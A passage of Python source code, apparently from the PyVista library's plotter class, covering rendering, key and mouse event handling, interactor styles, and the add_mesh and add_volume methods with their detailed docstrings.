set: ``plotter.store_image = True`` before closing the plotter.
"""
if not hasattr(self, 'ren_win') and self.last_image is not None:
return self.last_image
self._check_rendered()
self._check_has_ren_win()
data = image_from_window(self.ren_win)
if self.image_transparent_background:
return data
# ignore alpha channel
return data[:, :, :-1]
def render(self):
"""Render the main window.
Does nothing until ``show`` has been called.
"""
if hasattr(self, 'ren_win') and not self._first_time:
log.debug('Rendering')
self.ren_win.Render()
self._rendered = True
@wraps(RenderWindowInteractor.add_key_event)
def add_key_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.add_key_event."""
if hasattr(self, 'iren'):
self.iren.add_key_event(*args, **kwargs)
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key.
Parameters
----------
key : str
Key to clear events for.
"""
self.iren.clear_events_for_key(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.get_event_position()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.get_event_position()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks
supported here - use
:func:`pyvista.BasePlotter.track_click_position` instead.
"""
self.iren.track_mouse_position(self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self.iren.untrack_mouse_position()
@wraps(RenderWindowInteractor.track_click_position)
def track_click_position(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.track_click_position."""
self.iren.track_click_position(*args, **kwargs)
def untrack_click_position(self):
"""Stop tracking the click position."""
self.iren.untrack_click_position()
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size
and line width by the given value.
Parameters
----------
increment : float
Amount to increment point size and line width.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
if hasattr(self, 'iren'):
self.iren.clear_key_event_callbacks()
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self.iren.add_observer('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
@wraps(RenderWindowInteractor.key_press_event)
def key_press_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.key_press_event."""
self.iren.key_press_event(*args, **kwargs)
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
if hasattr(self.ren_win, 'GetOffScreenFramebuffer'):
if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex():
# must raise a runtime error as this causes a segfault on VTK9
raise ValueError('Invoking helper with no framebuffer')
# Get 2D click location on window
click_pos = self.iren.get_event_position()
# Get corresponding click location in the 3D plot
picker = _vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
@wraps(RenderWindowInteractor.enable_trackball_style)
def enable_trackball_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_style."""
self.iren.enable_trackball_style()
@wraps(RenderWindowInteractor.enable_trackball_actor_style)
def enable_trackball_actor_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_actor_style."""
self.iren.enable_trackball_actor_style()
@wraps(RenderWindowInteractor.enable_image_style)
def enable_image_style(self):
"""Wrap RenderWindowInteractor.enable_image_style."""
self.iren.enable_image_style()
@wraps(RenderWindowInteractor.enable_joystick_style)
def enable_joystick_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_style."""
self.iren.enable_joystick_style()
@wraps(RenderWindowInteractor.enable_joystick_actor_style)
def enable_joystick_actor_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_actor_style."""
self.iren.enable_joystick_actor_style()
@wraps(RenderWindowInteractor.enable_zoom_style)
def enable_zoom_style(self):
"""Wrap RenderWindowInteractor.enable_zoom_style."""
self.iren.enable_zoom_style()
@wraps(RenderWindowInteractor.enable_terrain_style)
def enable_terrain_style(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.enable_terrain_style."""
self.iren.enable_terrain_style(*args, **kwargs)
@wraps(RenderWindowInteractor.enable_rubber_band_style)
def enable_rubber_band_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_style."""
self.iren.enable_rubber_band_style()
@wraps(RenderWindowInteractor.enable_rubber_band_2d_style)
def enable_rubber_band_2d_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_2d_style."""
self.iren.enable_rubber_band_2d_style()
def enable_stereo_render(self):
"""Enable stereo rendering.
Disable this with :func:`disable_stereo_render
<BasePlotter.disable_stereo_render>`
Examples
--------
Enable stereo rendering to show a cube as an anaglyph image.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOn()
self.ren_win.SetStereoTypeToAnaglyph()
def disable_stereo_render(self):
"""Disable stereo rendering.
Enable again with :func:`enable_stereo_render
<BasePlotter.enable_stereo_render>`
Examples
--------
Enable and then disable stereo rendering. It should show a simple cube.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.disable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOff()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.get_interactor_style()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor
in milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if self.iren is not None:
update_rate = self.iren.get_desired_update_rate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.create_repeating_timer(stime)
self.render()
Plotter.last_update_time = curr_time
return
if force_redraw:
self.render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=None, split_sharp_edges=False,
ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
culling=None, rgb=None, categories=False, silhouette=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, pbr=False, metallic=0.0, roughness=0.5,
render=True, component=None, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.DataSet or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy
arrays of XYZ points.
color : str or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : str, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name
of an array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active
scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : str or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also
applicable when style='points'. Default ``5.0``.
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it
will be the global opacity of the mesh and uniformly
applied everywhere - should be between 0 and 1. A string
can also be specified to map the scalars range to a
predefined opacity transfer function (options include:
``'linear'``, ``'linear_r'``, ``'geom'``, ``'geom_r'``).
A string could also be used to map a scalars array from
the mesh to the opacity (must have same number of elements
as the ``scalars`` argument). Or you can pass a custom
made transfer function that is an array either
``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r``
suffix to do this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default ``False``.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is
``True``. When ``False``, OpenGL will interpolate the
mapped colors which can result is showing colors that are
not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the
``scalars``. See available Matplotlib colormaps. Only
applicable for when displaying ``scalars``. Requires
Matplotlib to be installed. ``colormap`` is also an
accepted alias for this. If ``colorcet`` or ``cmocean``
are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or bool, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
render_lines_as_tubes : bool, optional
Show lines as thick tubes rather than flat lines. Control
the width with ``line_width``.
smooth_shading : bool, optional
Enable smooth shading when ``True`` using either the
Gouraud or Phong shading algorithm. When ``False``, use
flat shading. Automatically enabled when ``pbr=True``.
See :ref:`shading_example`.
split_sharp_edges : bool, optional
Split sharp edges exceeding 30 degrees when plotting with
smooth shading. Control the angle with the optional
keyword argument ``feature_angle``. By default this is
``False``. Note that enabling this will create a copy of
the input mesh within the plotter. See
:ref:`shading_example`.
ambient : float, optional
When lighting is enabled, this is the amount of light in
the range of 0 to 1 (default 0.0) that reaches the actor
when not directed at the light source emitted from the
viewer.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0.
specular : float, optional
The specular lighting coefficient. Default 0.0.
specular_power : float, optional
The specular power. Between 0.0 and 128.0.
nan_color : str or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted
scalar array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0.
culling : str, optional
Does not render faces that are culled. Options are
``'front'`` or ``'back'``. This can be helpful for dense
surface meshes, especially when edges are visible, but can
cause flat meshes to be partially displayed. Defaults to
``False``.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot
those values as RGB(A) colors. ``rgba`` is also an
accepted alias for this. Opacity (the A) is optional. If
a scalars array ending with ``"_rgba"`` is passed, the default
becomes ``True``. This can be overridden by setting this
parameter to ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in
the scalar array will be used as the ``n_colors``
argument.
silhouette : dict, bool, optional
If set to ``True``, plot a silhouette highlight for the
mesh. This feature is only available for a triangulated
``PolyData``. As a ``dict``, it contains the properties
of the silhouette to display:
* ``color``: ``str`` or 3-item ``list``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond
to transparency.
below_color : str or 3 item list, optional
Solid color for values below the scalars range
(``clim``). This will automatically set the scalar bar
``below_label`` to ``'Below'``.
above_color : str or 3 item list, optional
Solid color for values below the scalars range
(``clim``). This will automatically set the scalar bar
``above_label`` to ``'Above'``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
and the values are the the string annotations.
pickable : bool, optional
Set whether this actor is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
mapped to the mesh. Default ``'points'``, causes the
scalars will be associated with the mesh points. Can be
either ``'points'`` or ``'cells'``.
log_scale : bool, optional
Use log scale when mapping data to colors. Scalars less
than zero are mapped to the smallest representable
positive float. Default: ``True``.
pbr : bool, optional
Enable physics based rendering (PBR) if the mesh is
``PolyData``. Use the ``color`` argument to set the base
color. This is only available in VTK>=9.
metallic : float, optional
Usually this value is either 0 or 1 for a real material
but any value in between is valid. This parameter is only
used by PBR interpolation. Default value is 0.0.
roughness : float, optional
This value has to be between 0 (glossy) and 1 (rough). A
glossy material has reflections and a high specular
part. This parameter is only used by PBR
interpolation. Default value is 0.5.
render : bool, optional
Force a render when ``True``. Default ``True``.
component : int, optional
Set component of vector valued scalars to plot. Must be
nonnegative, if supplied. If ``None``, the magnitude of
the vector is plotted.
**kwargs : dict, optional
Optional developer keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the mesh.
Examples
--------
Add a sphere to the plotter and show it with a custom scalar
bar title.
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere,
... scalar_bar_args={'title': 'Z Position'})
>>> plotter.show()
Plot using RGB on a single cell. Note that since the number of
points and the number of cells are identical, we have to pass
``preference='cell'``.
>>> import pyvista
>>> import numpy as np
>>> vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
>>> faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
>>> mesh = pyvista.PolyData(vertices, faces)
>>> mesh.cell_data['colors'] = [[255, 255, 255],
... [0, 255, 0],
... [0, 0, 255],
... [255, 0, 0]]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='cell')
>>> plotter.camera_position='xy'
>>> plotter.show()
Note how this varies from ``preference=='point'``. This is
because each point is now being individually colored, versus
in ``preference=='point'``, each cell face is individually
colored.
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='point')
>>> plotter.camera_position='xy'
>>> plotter.show()
Plot a plane with a constant color and vary its opacity by point.
>>> plane = pyvista.Plane()
>>> plane.plot(color='b', opacity=np.linspace(0, 1, plane.n_points),
... show_edges=True)
"""
self.mapper = make_mapper(_vtk.vtkDataSetMapper)
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError(f'Object type ({type(mesh)}) not supported for plotting in PyVista.')
##### Parse arguments to be used for all meshes #####
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {'n_colors': n_colors}
else:
scalar_bar_args = scalar_bar_args.copy()
if show_edges is None:
show_edges = self._theme.show_edges
if edge_color is None:
edge_color = self._theme.edge_color
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if lighting is None:
lighting = self._theme.lighting
if smooth_shading is None:
if pbr:
smooth_shading = True
else:
smooth_shading = self._theme.smooth_shading
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = self._theme.render_points_as_spheres
if name is None:
name = f'{type(mesh).__name__}({mesh.memory_address})'
if nan_color is None:
nan_color = self._theme.nan_color
nan_color = parse_color(nan_color, opacity=nan_opacity)
if color is True:
color = self._theme.color
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
feature_angle = kwargs.pop('feature_angle', 30)
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise TypeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if _has_matplotlib():
from itertools import cycle
import matplotlib
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, _vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
if silhouette:
if isinstance(silhouette, dict):
self.add_silhouette(mesh, silhouette)
else:
self.add_silhouette(mesh)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
scalar_bar_args.setdefault('title', scalars)
else:
scalars = None
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
# enable rgb if the scalars name ends with rgb or rgba
if rgb is None:
if scalars.endswith('_rgb') or scalars.endswith('_rgba'):
rgb = True
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
scalar_bar_args.setdefault('title', original_scalar_name)
# Compute surface normals if using smooth shading
if smooth_shading:
mesh, scalars = prepare_smooth_shading(
mesh, scalars, texture, split_sharp_edges, feature_angle, preference
)
if mesh.n_points < 1:
raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor = _vtk.vtkActor()
prop = _vtk.vtkProperty()
actor.SetMapper(self.mapper)
actor.SetProperty(prop)
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (_vtk.vtkTexture, _vtk.vtkOpenGLTexture)):
raise TypeError(f'Invalid texture type ({type(texture)})')
if mesh.GetPointData().GetTCoords() is None:
raise ValueError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# see https://github.com/pyvista/pyvista/issues/950
mesh.set_active_scalars(None)
# Handle making opacity array
custom_opac, opacity = process_opacity(
mesh, opacity, preference, n_colors, scalars, use_transparency
)
# Scalars formatting ==================================================
if scalars is not None:
show_scalar_bar, n_colors, clim = self.mapper.set_scalars(
mesh, scalars, scalar_bar_args, rgb,
component, preference, interpolate_before_map,
custom_opac, annotations, log_scale, nan_color, above_color,
below_color, cmap, flip_scalars, opacity, categories, n_colors,
clim, self._theme, show_scalar_bar,
)
elif custom_opac: # no scalars but custom opacity
self.mapper.set_custom_opacity(
opacity, color, mesh, n_colors, preference,
interpolate_before_map, rgb, self._theme,
)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = self._theme.outline_color
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise ValueError('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if pbr:
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Physically based rendering requires VTK 9 '
'or newer')
prop.SetInterpolationToPBR()
prop.SetMetallic(metallic)
prop.SetRoughness(roughness)
elif smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color, default_color=self._theme.color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
geom = pyvista.Triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
geom.points -= geom.center
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [geom, label, rgb_color]
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
self.add_actor(actor, reset_camera=reset_camera, name=name, culling=culling,
pickable=pickable, render=render)
# hide scalar bar if using special scalars
if scalar_bar_args.get('title') == '__custom_rgba':
show_scalar_bar = False
# Only show scalar bar if there are scalars
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
culling=False, multi_colors=False,
blending='composite', mapper=None,
scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0,
render=True, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
resolution : list, optional
Block resolution.
opacity : str or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'additive'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and
``'smart'``. If ``None`` the ``"volume_mapper"`` in the
``self._theme`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
and the values are the the string annotations.
pickable : bool, optional
Set whether this mesh is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
mapped to the mesh. Default ``'points'``, causes the
scalars will be associated with the mesh points. Can be
either ``'points'`` or ``'cells'``.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity
transfer function is defined. Meaning that over that
distance, a given opacity (from the transfer function) is
accumulated. This is adjusted for the actual sampling
distance during rendering. By default, this is the length
of the diagonal of the bounding box of the volume divided
by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may
perform shading calculations - in some cases shading does
not apply (for example, in a maximum intensity projection)
and therefore shading will not be performed even if this
flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default ``1.0``.
specular : float, optional
The specular lighting coefficient. Default ``0.0``.
specular_power : float, optional
The specular power. Between ``0.0`` and ``128.0``.
render : bool, optional
Force a render when True. Default ``True``.
**kwargs : dict, optional
Optional keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the volume.
Examples
--------
Show a built-in volume example with the coolwarm colormap.
>>> from pyvista import examples
>>> import pyvista as pv
>>> bolt_nut = examples.download_bolt_nut()
>>> pl = pv.Plotter()
>>> _ = pl.add_volume(bolt_nut, cmap="coolwarm")
>>> pl.show()
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
# Avoid mutating input
